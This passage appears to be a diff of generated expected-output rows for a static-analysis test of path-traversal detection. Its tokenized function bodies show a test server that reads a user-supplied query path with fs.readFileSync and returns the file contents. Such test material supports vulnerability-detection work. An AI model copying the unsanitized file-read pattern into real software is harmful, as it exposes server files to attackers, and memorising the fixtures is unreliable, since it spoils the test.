enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:12:13:12:27 | fs.readFileSync | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:12:13:12:33 | exceptional return of fs.read ... c(path) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:12:13:12:33 | exceptional return of fs.read ... c(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/typescript.ts:12:13:12:33 | exceptional return of fs.read ... c(path) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:12:13:12:33 | exceptional return of fs.read ... c(path) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:12:13:12:33 | exceptional return of fs.read ... c(path) | fileImports | fs http path sanitize-filename url | | autogenerated/TaintedPath/typescript.ts:12:13:12:33 | fs.read ... c(path) | CalleeFlexibleAccessPath | res.write | | autogenerated/TaintedPath/typescript.ts:12:13:12:33 | fs.read ... c(path) | InputArgumentIndex | 0 | | autogenerated/TaintedPath/typescript.ts:12:13:12:33 | fs.read ... c(path) | contextFunctionInterfaces | | @@ -11671,6 +88824,11 @@ tokenFeatures | autogenerated/TaintedPath/typescript.ts:12:13:12:33 | fs.read ... c(path) | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/typescript.ts:12:13:12:33 | fs.read ... c(path) | fileImports | fs http path sanitize-filename url | | autogenerated/TaintedPath/typescript.ts:12:13:12:33 | fs.read ... c(path) | receiverName | res | +| autogenerated/TaintedPath/typescript.ts:12:16:12:27 | readFileSync | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:12:16:12:27 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/typescript.ts:12:16:12:27 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:12:16:12:27 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:12:16:12:27 | readFileSync | fileImports | fs http path sanitize-filename url | | autogenerated/TaintedPath/typescript.ts:12:29:12:32 | path | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/typescript.ts:12:29:12:32 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/typescript.ts:12:29:12:32 | path | calleeImports | fs | @@ -11680,6 +88838,71 @@ tokenFeatures | autogenerated/TaintedPath/typescript.ts:12:29:12:32 | path | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/typescript.ts:12:29:12:32 | path | fileImports | fs http path sanitize-filename url | | autogenerated/TaintedPath/typescript.ts:12:29:12:32 | path | receiverName | fs | +| autogenerated/TaintedPath/typescript.ts:14:7:14:10 | path | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:14:7:14:10 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/typescript.ts:14:7:14:10 | path | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:14:7:14:10 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:14:7:14:10 | path | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:14:7:14:24 | path | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:14:7:14:24 | path | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:14:7:14:24 | path | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/typescript.ts:14:7:14:24 | path | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/typescript.ts:14:7:14:24 | path | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:14:7:14:24 | path | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:14:7:14:24 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:14:7:14:24 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:14:7:14:24 | path | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:14:7:14:24 | path | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:14:7:14:24 | path === 'foo.txt' | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:14:7:14:24 | path === 'foo.txt' | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/typescript.ts:14:7:14:24 | path === 'foo.txt' | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:14:7:14:24 | path === 'foo.txt' | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:14:7:14:24 | path === 'foo.txt' | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:14:16:14:24 | 'foo.txt' | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:14:16:14:24 | 'foo.txt' | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/typescript.ts:14:16:14:24 | 'foo.txt' | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:14:16:14:24 | 'foo.txt' | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:14:16:14:24 | 'foo.txt' | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:15:5:15:7 | res | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:15:5:15:7 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/typescript.ts:15:5:15:7 | res | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:15:5:15:7 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:15:5:15:7 | res | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:15:5:15:13 | res.write | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:15:5:15:13 | res.write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/typescript.ts:15:5:15:13 | res.write | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:15:5:15:13 | res.write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:15:5:15:13 | res.write | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:15:5:15:36 | exceptional return of res.wri ... (path)) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:15:5:15:36 | exceptional return of res.wri ... (path)) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/typescript.ts:15:5:15:36 | exceptional return of res.wri ... (path)) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:15:5:15:36 | exceptional return of res.wri ... (path)) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:15:5:15:36 | exceptional return of res.wri ... (path)) | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:15:5:15:36 | res.wri ... (path)) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:15:5:15:36 | res.wri ... (path)) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/typescript.ts:15:5:15:36 | res.wri ... (path)) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:15:5:15:36 | res.wri ... (path)) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:15:5:15:36 | res.wri ... (path)) | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:15:9:15:13 | write | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:15:9:15:13 | write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/typescript.ts:15:9:15:13 | write | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:15:9:15:13 | write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:15:9:15:13 | write | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:15:15:15:16 | fs | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:15:15:15:16 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/typescript.ts:15:15:15:16 | fs | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:15:15:15:16 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:15:15:15:16 | fs | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:15:15:15:29 | fs.readFileSync | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:15:15:15:29 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/typescript.ts:15:15:15:29 | fs.readFileSync | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:15:15:15:29 | fs.readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:15:15:15:29 | fs.readFileSync | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:15:15:15:35 | exceptional return of fs.read ... c(path) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:15:15:15:35 | exceptional return of fs.read ... c(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/typescript.ts:15:15:15:35 | exceptional return of fs.read ... c(path) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:15:15:15:35 | exceptional return of fs.read ... c(path) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:15:15:15:35 | exceptional return of fs.read ... c(path) | fileImports | fs http path sanitize-filename url | | autogenerated/TaintedPath/typescript.ts:15:15:15:35 | fs.read ... c(path) | CalleeFlexibleAccessPath | res.write | | autogenerated/TaintedPath/typescript.ts:15:15:15:35 | fs.read ... c(path) | InputArgumentIndex | 0 | | autogenerated/TaintedPath/typescript.ts:15:15:15:35 | fs.read ... c(path) | contextFunctionInterfaces | | @@ -11688,6 +88911,11 @@ tokenFeatures | autogenerated/TaintedPath/typescript.ts:15:15:15:35 | fs.read ... c(path) | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/typescript.ts:15:15:15:35 | fs.read ... c(path) | fileImports | fs http path sanitize-filename url | | autogenerated/TaintedPath/typescript.ts:15:15:15:35 | fs.read ... c(path) | receiverName | res | +| autogenerated/TaintedPath/typescript.ts:15:18:15:29 | readFileSync | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:15:18:15:29 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/typescript.ts:15:18:15:29 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:15:18:15:29 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:15:18:15:29 | readFileSync | fileImports | fs http path sanitize-filename url | | autogenerated/TaintedPath/typescript.ts:15:31:15:34 | path | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/typescript.ts:15:31:15:34 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/typescript.ts:15:31:15:34 | path | calleeImports | fs | @@ -11697,6 +88925,86 @@ tokenFeatures | autogenerated/TaintedPath/typescript.ts:15:31:15:34 | path | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/typescript.ts:15:31:15:34 | path | fileImports | fs http path sanitize-filename url | | autogenerated/TaintedPath/typescript.ts:15:31:15:34 | path | receiverName | fs | +| autogenerated/TaintedPath/typescript.ts:17:3:17:3 | path | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:17:3:17:3 | path | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/typescript.ts:17:3:17:3 | path | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:17:3:17:3 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:17:3:17:3 | path | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:17:7:17:11 | path2 | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:17:7:17:11 | path2 | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/typescript.ts:17:7:17:11 | path2 | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:17:7:17:11 | path2 | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:17:7:17:11 | path2 | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:17:7:17:18 | path2 | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:17:7:17:18 | path2 | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/typescript.ts:17:7:17:18 | path2 | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:17:7:17:18 | path2 | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:17:7:17:18 | path2 | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:17:7:17:18 | path2 = path | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:17:7:17:18 | path2 = path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/typescript.ts:17:7:17:18 | path2 = path | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:17:7:17:18 | path2 = path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:17:7:17:18 | path2 = path | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:17:15:17:18 | path | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:17:15:17:18 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/typescript.ts:17:15:17:18 | path | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:17:15:17:18 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:17:15:17:18 | path | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:18:3:18:7 | path2 | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:18:3:18:7 | path2 | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:18:3:18:7 | path2 | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/typescript.ts:18:3:18:7 | path2 | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/typescript.ts:18:3:18:7 | path2 | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:18:3:18:7 | path2 | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:18:3:18:7 | path2 | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:18:3:18:7 | path2 | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:18:3:18:7 | path2 | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:18:3:18:7 | path2 | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:18:3:18:45 | path2 \| ... path2)) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:18:3:18:45 | path2 \| ... path2)) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/typescript.ts:18:3:18:45 | path2 \| ... path2)) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:18:3:18:45 | path2 \| ... path2)) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:18:3:18:45 | path2 \| ... path2)) | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:18:13:18:15 | res | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:18:13:18:15 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/typescript.ts:18:13:18:15 | res | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:18:13:18:15 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:18:13:18:15 | res | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:18:13:18:21 | res.write | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:18:13:18:21 | res.write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/typescript.ts:18:13:18:21 | res.write | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:18:13:18:21 | res.write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:18:13:18:21 | res.write | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:18:13:18:45 | exceptional return of res.wri ... path2)) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:18:13:18:45 | exceptional return of res.wri ... path2)) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/typescript.ts:18:13:18:45 | exceptional return of res.wri ... path2)) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:18:13:18:45 | exceptional return of res.wri ... path2)) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:18:13:18:45 | exceptional return of res.wri ... path2)) | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:18:13:18:45 | res.wri ... path2)) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:18:13:18:45 | res.wri ... path2)) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/typescript.ts:18:13:18:45 | res.wri ... path2)) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:18:13:18:45 | res.wri ... path2)) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:18:13:18:45 | res.wri ... path2)) | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:18:17:18:21 | write | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:18:17:18:21 | write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/typescript.ts:18:17:18:21 | write | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:18:17:18:21 | write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:18:17:18:21 | write | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:18:23:18:24 | fs | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:18:23:18:24 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/typescript.ts:18:23:18:24 | fs | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:18:23:18:24 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:18:23:18:24 | fs | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:18:23:18:37 | fs.readFileSync | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:18:23:18:37 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/typescript.ts:18:23:18:37 | fs.readFileSync | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:18:23:18:37 | fs.readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:18:23:18:37 | fs.readFileSync | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:18:23:18:44 | exceptional return of fs.read ... (path2) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:18:23:18:44 | exceptional return of fs.read ... (path2) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/typescript.ts:18:23:18:44 | exceptional return of fs.read ... (path2) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:18:23:18:44 | exceptional return of fs.read ... (path2) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:18:23:18:44 | exceptional return of fs.read ... (path2) | fileImports | fs http path sanitize-filename url | | autogenerated/TaintedPath/typescript.ts:18:23:18:44 | fs.read ... (path2) | CalleeFlexibleAccessPath | res.write | | autogenerated/TaintedPath/typescript.ts:18:23:18:44 | fs.read ... (path2) | InputArgumentIndex | 0 | | autogenerated/TaintedPath/typescript.ts:18:23:18:44 | fs.read ... (path2) | contextFunctionInterfaces | | @@ -11705,6 +89013,11 @@ tokenFeatures | autogenerated/TaintedPath/typescript.ts:18:23:18:44 | fs.read ... (path2) | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/typescript.ts:18:23:18:44 | fs.read ... (path2) | fileImports | fs http path sanitize-filename url | | autogenerated/TaintedPath/typescript.ts:18:23:18:44 | fs.read ... (path2) | receiverName | res | +| autogenerated/TaintedPath/typescript.ts:18:26:18:37 | readFileSync | contextFunctionInterfaces | | +| 